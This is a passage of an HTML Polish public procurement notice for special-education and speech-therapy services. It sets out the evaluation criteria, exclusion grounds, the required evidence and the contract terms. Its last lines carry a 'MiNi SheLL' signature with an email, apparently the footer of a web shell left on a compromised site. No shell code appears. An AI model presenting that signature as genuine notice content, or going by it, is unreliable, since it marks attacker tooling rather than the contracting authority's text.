zaangażowanie zawodowe osoby w realizację wszystkich projektów finansowanych z funduszy strukturalnych i FS oraz działań finansowanych z innych źródeł, w tym środków własnych beneficjenta i innych podmiotów, nie przekracza po przeliczeniu 276 godzin miesięcznie (jeśli dotyczy). </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 64800 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80340000-9 - Usługi edukacji specjalnej</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2026-07-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Ocenę końcową oferty dla danego zamówienia stanowić będzie suma punktów oferty uzyskanych w<br/>kryterium „Cena” i „doświadczenie osoby/osób wyznaczonej/wskazanych do realizacji zamówienia” oraz „Aspekt społeczny”.<br/>Maksymalna liczba punktów jaką może uzyskać Wykonawca wynosi – 100 pkt. Obliczenia będą prowadzone z dokładnością do 2<br/>miejsc po przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">45</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">aspekty społeczne</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">45</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">aspekty społeczne, w tym integracja zawodowa i społeczna osób, o których mowa w art. 94 ust. 1 ustawy</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">aspekty społeczne</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit a</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit b</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 6.1	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w postępowaniu dotyczące: <br/>1)	zdolności do występowania w obrocie gospodarczym:<br/>	informację z Krajowego Rejestru Karnego sporządzoną nie wcześniej niż 6 miesięcy przed jej złożeniem w zakresie: <br/>	- art. 108 ust. 1 pkt 1 i 2 Pzp, <br/>	- art. 108 ust. 1 pkt 4 Pzp, dotyczącej orzeczenia zakazu ubiegania się o zamówienie publiczne tytułem środka karnego, <br/>	- art. 109 ust. 1 pkt 2 lit. a Pzp, <br/>	- art. 109 ust. 1 pkt 2 lit. b Pzp, dotyczącej ukarania za wykroczenie, za które wymierzono karę aresztu,<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów <br/>Zamawiający nie określa szczegółowego warunku w tym zakresie; <br/>3) sytuacji ekonomicznej lub finansowej <br/>Zamawiający nie określa szczegółowego warunku w tym zakresie; <br/>5)	zdolności technicznej lub zawodowej <br/>O udzielenie zamówienia może ubiegać się wykonawca,<br/>a.	który posiada doświadczenie niezbędne do wykonania przedmiotu zamówienia tj. w okresie ostatnich 5 lat przed terminem składania ofert zrealizował co najmniej 1 usługę<br/>Uwaga: w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum) doświadczenie będzie sumowane, z tym zastrzeżeniem, że doświadczenie w zakresie jednej części konsorcjant musi spełnić samodzielnie (doświadczenie konsorcjanta nie sumuje się z doświadczeniem innego konsorcjanta).<br/>Podobnie w przypadku powoływania się na zasoby podmiotu trzeciego w celu spełnienia warunków udziału w postępowaniu (w zakresie doświadczenia), podmiot ten musi samodzielnie posiadać doświadczenie opisane powyżej.<br/>b.	który dysponuje min. 1 osobą zdolną do wykonania zamówienia, posiadającej przygotowanie pedagogiczne, o którym mowa w rozporządzeniu Ministra Edukacji i Nauki z dnia 14 września 2023 r. w sprawie szczegółowych kwalifikacji wymaganych od nauczycieli (Dz. U. z 2023 r. poz. 2102), którą skieruje do realizacji przedmiotowego zamówienia, z doświadczeniem w zrealizowaniu integracji sensorycznej oraz logopedii <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W celu potwierdzenia braku podstaw wykluczenia Wykonawcy z udziału w postępowaniu należy złożyć: <br/>	a) informację z Krajowego Rejestru Karnego sporządzoną nie wcześniej niż 6 miesięcy przed jej złożeniem w zakresie: <br/>	- art. 108 ust. 1 pkt 1 i 2 Pzp, <br/>	- art. 108 ust. 1 pkt 4 Pzp, dotyczącej orzeczenia zakazu ubiegania się o zamówienie publiczne tytułem środka karnego, <br/>	- art. 109 ust. 1 pkt 2 lit. a Pzp, <br/>	- art. 109 ust. 1 pkt 2 lit. b Pzp, dotyczącej ukarania za wykroczenie, za które wymierzono karę aresztu, <br/>	2) W celu potwierdzenia spełniania przez Wykonawcę warunków udziału w postępowaniu dotyczących zdolności technicznej lub zawodowej należy złożyć: <br/>	wykaz usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających, czy te dostawy lub usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego dostawy lub usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">8.1. Wykonawca zobowiązany jest złożyć wraz z ofertą oświadczenia stanowiące wstępne potwierdzenie, że Wykonawca na dzień składania ofert nie podlega wykluczeniu oraz spełnia warunki udziału w postępowaniu (Załącznik nr 2 do SWZ) <br/>	Jeżeli złożone przez Wykonawcę oświadczenia, o których mowa w pkt 8.1 SWZ budzą wątpliwości Zamawiającego, może on zwrócić się bezpośrednio do podmiotu, który jest w posiadaniu informacji lub dokumentów istotnych w tym zakresie dla oceny braku podstaw wykluczenia, o przedstawienie takich informacji lub dokumentów. <br/>	8.2. Zamawiający, zgodnie z art. 274 ust. 1 ustawy, wezwie Wykonawcę, którego oferta zostanie najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, podmiotowych środków dowodowych, aktualnych na dzień składania, potwierdzających okoliczności, o których mowa w art. 273 ust. 1 ustawy:<br/>	1) W przypadku podmiotów występujących wspólnie, oświadczenie (Załącznik nr 2 do SWZ) składa każdy Wykonawca. <br/>	8.1.1. Jeżeli Wykonawca nie złożył oświadczeń, o których mowa w pkt 8.1 SWZ (Załącznik nr 2 do SWZ) lub są one niekompletne lub zawierają błędy, Zamawiający wezwie Wykonawcę odpowiednio do jego złożenia, poprawienia lub uzupełnienia w wyznaczonym terminie, chyba że oferta Wykonawcy podlega odrzuceniu bez względu na ich złożenie, uzupełnienie lub poprawienie lub zachodzą przesłanki unieważnienia postępowania. <br/>	1) W celu potwierdzenia braku podstaw wykluczenia Wykonawcy z udziału w postępowaniu należy złożyć: <br/>	a) informację z Krajowego Rejestru Karnego sporządzoną nie wcześniej niż 6 miesięcy przed jej złożeniem w zakresie: <br/>	- art. 108 ust. 1 pkt 1 i 2 Pzp, <br/>	- art. 108 ust. 1 pkt 4 Pzp, dotyczącej orzeczenia zakazu ubiegania się o zamówienie publiczne tytułem środka karnego, <br/>	- art. 109 ust. 1 pkt 2 lit. a Pzp, <br/>	- art. 109 ust. 1 pkt 2 lit. b Pzp, dotyczącej ukarania za wykroczenie, za które wymierzono karę aresztu, <br/>	2) W celu potwierdzenia spełniania przez Wykonawcę warunków udziału w postępowaniu dotyczących zdolności technicznej lub zawodowej należy złożyć: <br/>	wykaz usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających, czy te dostawy lub usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego dostawy lub usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum) doświadczenie będzie sumowane, z tym zastrzeżeniem, że doświadczenie w zakresie jednej części konsorcjant musi spełnić samodzielnie (doświadczenie konsorcjanta nie sumuje się z doświadczeniem innego konsorcjanta). <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający, zgodnie z art. 455 ust. 1 pkt. 1) PZP, przewiduje możliwość dokonania zmian postanowień zawartej umowy w<br/>stosunku do treści oferty wynikających z:<br/>1) konieczności wprowadzenia zmian będących następstwem zmian wytycznych, wymagań lub zaleceń instytucji, która<br/>przyznała środki na sfinansowanie niniejszej umowy,<br/>2) konieczności zmian będących następstwem zmian w zawartej przez Zamawiającego umowie o dofinansowanie Projektu,<br/>3) zmiany przepisów prawa mających wpływ na wykonanie przedmiotu umowy,<br/>4) wystąpienia okoliczności siły wyższej, przez którą należy rozumieć zdarzenia niezależne od żadnej ze stron, zewnętrzne,<br/>niemożliwe do zapobieżenia, które zakłócają lub uniemożliwiają realizację umowy, w szczególności: wojny, akty terroryzmu,<br/>klęski żywiołowe, strajki oraz akty władzy i administracji publicznej, stany wyjątkowe, stany wojenne, katastrofy, stany<br/>zagrożenia, pandemie, epidemie, okresy kwarantanny.<br/>W przypadku ich wystąpienia ulec może zmianie termin realizacji zamówienia o liczbę dni, odpowiadającą okresowi<br/>występowania okoliczności siły wyższej, zakres rzeczowy przedmiotu zamówienia, cena umowy brutto, termin płatności,<br/>zasady rozliczeń (o ile zmiana zasad rozliczeń nie spowoduje konieczności zapłaty Wykonawcy odsetek lub wynagrodzenia<br/>w większej kwocie), sposób realizacji przedmiotu zamówienia,<br/>5) zmniejszenie/ograniczenie zakresu przedmiotu umowy, gdy jego wykonanie w pierwotnym zakresie nie leży w interesie<br/>publicznym lub gdy wykonanie tego zakresu nie będzie możliwe z przyczyn niezależnych od Stron niniejszej umowy,<br/>6) zmniejszenie/ograniczenie wynagrodzenia należnego Wykonawcy w przypadku zmniejszenia zakresu przedmiotu<br/>umowy, w sytuacji, o której mowa w pkt 5), na podstawie wyliczenia wartości zmniejszonego zakresu określonej przez<br/>Strony umowy,<br/>7) zmiana terminu realizacji przedmiotu umowy, w przypadku:<br/>a) gdy zachowanie pierwotnie określonego terminu nie leży w interesie publicznym, o okres umożliwiający osiągnięcie<br/>uzasadnionego interesu publicznego,<br/>b) konieczności zmniejszenia zakresu przedmiotu umowy, gdy jego wykonanie w pierwotnym zakresie nie leży w interesie<br/>publicznym, o okres proporcjonalny do zmniejszonego/ograniczonego zakresu,<br/>c) zmiany terminu realizacji zadania objętego projektem – w takim przypadku dopuszcza się możliwość zmiany terminu<br/>Umowy z uwzględnieniem terminu zakończenia projektu zatwierdzonego przez Instytucję Zarządzającą<br/>Zamawiający przewiduje możliwość waloryzacji zamówienia <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-11-03 08:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ezamowienia.gov.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-11-03 08:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Wykonawca podlega wykluczeniu także w oparciu o podstawy wykluczenia wskazane art. 7 ustawy z dnia 13 kwietnia<br/>2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie<br/>bezpieczeństwa narodowego (t. j. Dz. U. 2025 r., poz. 514)

Creat By MiNi SheLL
Email: jattceo@gmail.com